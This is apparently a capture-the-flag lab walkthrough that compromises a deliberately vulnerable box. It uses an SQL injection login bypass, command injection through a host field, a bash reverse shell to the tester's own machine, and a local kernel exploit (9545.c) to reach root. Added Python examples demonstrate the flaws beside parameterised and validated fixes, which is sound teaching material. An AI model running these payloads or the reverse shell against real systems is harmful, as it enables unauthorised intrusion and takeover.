First, I launched a full TCP port scan against the target, skipping host discovery (-Pn), covering every port (-p-), and enabling version detection plus default scripts (-A).
nmap -Pn -A -sV -p- $target
WEB - 80
A directory brute-force against the web server returned the following:

/cgi-bin/ (Status: 403) [Size: 289]
/cgi-bin/.html (Status: 403) [Size: 294]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 315]
/usage (Status: 403) [Size: 286]
The login form on index.php was vulnerable to a SQL injection authentication bypass: the payload below closes the string literal, ORs in an always-true condition, and comments out the rest of the query (including the password check).
admin' or '1'='1'#
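To show why that payload works, here is the bypass reproduced against an in-memory SQLite table, with the string-built query beside a parameterised one. This is an added example, not the target's code (the page never shows the application's source); the table, rows and column names are constructed for the demo. SQLite's line comment is `--` rather than MySQL's `#`, so the payload ends in `-- ` instead of `#`; the structure is otherwise identical.

```python
import sqlite3


def make_db():
    """Constructed demo schema (assumption: the real app's table is unknown)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "hunter2"), ("bob", "pa55")])
    return db


def build_query(username, password):
    """The vulnerable pattern: user text is pasted straight into SQL grammar."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(db, username, password):
    """Returns the matched username, or None. With the payload
    admin' or '1'='1'--  the WHERE clause becomes
    username = 'admin' or '1'='1' and the password check is commented out."""
    row = db.execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Bound parameters: values travel separately from the statement text,
    so a quote in the input is data, never SQL syntax."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1'-- "
    print(build_query(payload, "wrong"))
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))  # admin
    print("safe:      ", login_safe(db, payload, "wrong"))        # None
```

The parameterised version does not need any quoting or escaping of its own; the driver never lets the input touch the statement text.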
Once logged in, I noticed that the application took a host from a form field and ran a command against it on the underlying operating system.
So I tried appending my own command to that field to see whether the input was handed to a shell unsanitised.
127.0.0.1 && whoami
The output of whoami came back in the page, confirming command execution on the machine through the web portal. With a listener waiting on port 443 of my attack box (192.168.0.108), I used the same injection point to send a reverse shell back to it:
127.0.0.1 && bash -i >& /dev/tcp/192.168.0.108/443 0>&1
And it worked!
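The injection above and its fix, as an added example that is not the target's own code: I am assuming the form fed its value to ping (the page only shows that 127.0.0.1 was accepted as input), so the vulnerable handler below interpolates the host into a shell string, while the hardened one validates the value as an IP address and passes it as a single argv element with no shell involved. The function names are my own.

```python
import ipaddress
import subprocess


def ping_vulnerable(host: str) -> str:
    """Interpolate user input into one shell string and hand it to /bin/sh.

    sh parses the whole string, so '&&', ';', '|' and '$(...)' inside `host`
    become new commands. The page's payload '127.0.0.1 && whoami' runs whoami
    only if the ping exits 0; '127.0.0.1; whoami' runs it unconditionally.
    (Assumption: the real app ran ping; its code is not on the page.)
    """
    cmd = f"ping -c 1 -W 1 {host}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def is_valid_target(host: str) -> bool:
    """Accept only a literal IPv4/IPv6 address. Anything carrying spaces or
    shell metacharacters fails to parse and is rejected before execution."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def ping_hardened(host: str):
    """Validate first, then run ping with an argv list and no shell, so the
    value can never be split into extra commands. Returns None when rejected."""
    if not is_valid_target(host):
        return None  # the caller reports a validation error; nothing is run
    result = subprocess.run(["ping", "-c", "1", "-W", "1", host],
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print(ping_vulnerable("127.0.0.1; whoami"))   # ping output followed by the user name
    print(ping_hardened("127.0.0.1 && whoami"))   # None: rejected, never executed
```

Both layers matter: the allow-list stops the payload at the door, and the argv form means that even a value which slips past validation is still just one argument to ping, not shell syntax.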
While running LinPEAS, I noticed that the box was running a very old kernel, 2.6.9-55.EL, from the RHEL/CentOS 4 line.
A failed kernel exploit can crash the target, so this is worth keeping as a fallback rather than a first move, but here it looked like the quickest route. I went to searchsploit to look for a kernel exploit that would fit this particular target.
searchsploit linux 2.6 centos
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' | linux/local/9545.c
This was the exploit I ended up going with.
I transferred the source to the remote machine and compiled it there with GCC, so that the resulting binary matched the target's architecture and libc.
gcc -o exploit 9545.c
However, gcc complained that the file had no newline at the end. The C standard requires a non-empty source file to end in a newline character, and this copy of 9545.c did not, so I appended one and compiled again.
After fixing that, the exploit compiled with no issues.
And I was the root user! 😁